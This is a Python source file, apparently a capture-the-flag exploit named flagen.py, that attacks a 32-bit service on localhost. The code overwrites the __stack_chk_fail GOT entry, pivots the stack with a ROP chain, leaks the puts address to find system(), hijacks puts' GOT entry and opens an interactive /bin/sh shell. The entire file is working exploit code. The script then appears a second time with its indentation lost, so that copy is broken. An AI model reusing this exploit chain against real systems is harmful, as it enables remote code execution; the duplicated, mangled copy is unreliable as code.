otms61/flagen.py

## flagen.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import struct
import telnetlib


def sock(remoteip, remoteport):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remoteip, remoteport))
    f = s.makefile('rw', bufsize=0)
    return s, f


def read_until(f, delim='\n'):
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data


def p(a):
    return struct.pack("<I", a)


def u(a):
    return struct.unpack("<I", a)[0]


def shell(s):
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()


s, f = sock('localhost', 4444)

ret = 0x804846a
popret = 0x8048481

# 0x08048d8f: pop ebp ; ret  ;  (1 found)
pop_ebp_ret = 0x08048d8f

# 0x08048d8e: pop edi ; pop ebp ; ret  ;  (1 found)
pop2ret = 0x08048d8e
pop3ret = 0x8048d8d
leaveret = 0x80485d8
addesp_300 = 0x8048afa


puts_got = 0x804b010
puts_plt = 0x8048510
read_plt = 0x80484a0

puts_system_offset = 0x254c0

read_buf_size_func = 0x80486CB

# __stack_chk_fail@plt = 0x80484e0
# 0x80484e0 <__stack_chk_fail@plt>:	jmp    DWORD PTR ds:0x804b01c
stack_chk_fail_GOT = 0x804b01c

data_addr = 0x0804b620

f.write('1\n')

payload = ''
payload += p(addesp_300)  # overwrite by this
payload += 'b'*9
payload += 'h'*85
payload += p(pop2ret)
payload += 'b'*4
payload += p(stack_chk_fail_GOT)  # stack_chk_fail's got is overwritten and execute in 0x80488bf
payload += p(read_buf_size_func)
payload += p(pop_ebp_ret)
payload += p(data_addr)
payload += p(leaveret)
f.write(payload + '\n')

read_until(f, 'Done.\n')
f.write('4\n')

payload2 = ''
payload2 += p(0xdeadbeaf)
payload2 += p(puts_plt)
payload2 += p(popret)
payload2 += p(puts_got)  # got leak
payload2 += p(read_plt)
payload2 += p(pop3ret)
payload2 += p(0)
payload2 += p(puts_got)  # got overwirte and send /bin/sh\0
payload2 += p(12)
payload2 += p(puts_plt)  # puts's got is overwritten by system
payload2 += p(0xdeadbeaf)
payload2 += p(puts_got+4)  # /bin/sh\0

f.write(payload2 + '\n')
read_until(f, 'Your choice: ')
puts_addr = u(f.read(4))
system_addr = puts_addr - puts_system_offset
print '[*] puts addr: {}'.format(hex(puts_addr))
print '[*] system addr: {}'.format(hex(puts_addr))

f.write(p(system_addr) + '/bin/sh\0')
shell(s)
	#!/usr/bin/python
	# -- coding: utf-8 --
	import socket
	import struct
	import telnetlib


	def sock(remoteip, remoteport):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((remoteip, remoteport))
	f = s.makefile('rw', bufsize=0)
	return s, f


	def read_until(f, delim='\n'):
	data = ''
	while not data.endswith(delim):
	data += f.read(1)
	return data


	def p(a):
	return struct.pack("<I", a)


	def u(a):
	return struct.unpack("<I", a)[0]


	def shell(s):
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()


	s, f = sock('localhost', 4444)

	ret = 0x804846a
	popret = 0x8048481

	# 0x08048d8f: pop ebp ; ret ; (1 found)
	pop_ebp_ret = 0x08048d8f

	# 0x08048d8e: pop edi ; pop ebp ; ret ; (1 found)
	pop2ret = 0x08048d8e
	pop3ret = 0x8048d8d
	leaveret = 0x80485d8
	addesp_300 = 0x8048afa


	puts_got = 0x804b010
	puts_plt = 0x8048510
	read_plt = 0x80484a0

	puts_system_offset = 0x254c0

	read_buf_size_func = 0x80486CB

	# __stack_chk_fail@plt = 0x80484e0
	# 0x80484e0 <__stack_chk_fail@plt>: jmp DWORD PTR ds:0x804b01c
	stack_chk_fail_GOT = 0x804b01c

	data_addr = 0x0804b620

	f.write('1\n')

	payload = ''
	payload += p(addesp_300) # overwrite by this
	payload += 'b'*9
	payload += 'h'*85
	payload += p(pop2ret)
	payload += 'b'*4
	payload += p(stack_chk_fail_GOT) # stack_chk_fail's got is overwritten and execute in 0x80488bf
	payload += p(read_buf_size_func)
	payload += p(pop_ebp_ret)
	payload += p(data_addr)
	payload += p(leaveret)
	f.write(payload + '\n')

	read_until(f, 'Done.\n')
	f.write('4\n')

	payload2 = ''
	payload2 += p(0xdeadbeaf)
	payload2 += p(puts_plt)
	payload2 += p(popret)
	payload2 += p(puts_got) # got leak
	payload2 += p(read_plt)
	payload2 += p(pop3ret)
	payload2 += p(0)
	payload2 += p(puts_got) # got overwirte and send /bin/sh\0
	payload2 += p(12)
	payload2 += p(puts_plt) # puts's got is overwritten by system
	payload2 += p(0xdeadbeaf)
	payload2 += p(puts_got+4) # /bin/sh\0

	f.write(payload2 + '\n')
	read_until(f, 'Your choice: ')
	puts_addr = u(f.read(4))
	system_addr = puts_addr - puts_system_offset
	print '[*] puts addr: {}'.format(hex(puts_addr))
	print '[*] system addr: {}'.format(hex(puts_addr))

	f.write(p(system_addr) + '/bin/sh\0')
	shell(s)